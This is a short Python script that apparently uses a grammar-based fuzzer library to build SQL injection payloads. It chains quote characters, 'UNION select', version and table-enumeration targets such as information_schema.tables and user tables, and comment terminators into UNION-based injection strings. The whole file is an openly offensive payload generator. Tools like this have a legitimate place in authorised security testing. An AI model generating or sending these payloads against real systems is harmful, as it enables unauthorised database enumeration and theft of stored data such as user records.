from FuzzyCrawler_Grammar_Fuzzer import FCGFuzzer
G5=FCGFuzzer()
G5.Definition("opening_Bracket", ["("])
G5.Definition("single_Quote", ["' "]),
G5.Definition("union_select", ["UNION select "])
G5.Definition("Null", ["NULL"])
G5.Definition("Comma", [","])
G5.Definition("string_Check", ["a"])
G5.Definition("Version_OR_Database_Content", ["@@version","version()","version FROM v$instance","banner FROM v$version","* FROM all_tables","* FROM information_schema.tables","* from users","* from user"])
G5.Definition("apostrophe_OR_Space", [";"," "])
G5.Definition("comment", [" --"," #"," /*"])
G5.Definition("closing_Bracket", [")"])
G5.grammar_input_Parser('O',"opening_Bracket")
G5.grammar_input_Parser('C',"single_Quote")
G5.grammar_input_Parser('C',"union_select")
G5.grammar_input_Parser('C',"Version_OR_Database_Content")
G5.grammar_input_Parser('O',"apostrophe_OR_Space")
G5.grammar_input_Parser('C',"comment")
G5.grammar_input_Parser('O',"closing_Bracket")
G5.grammarFuzzer()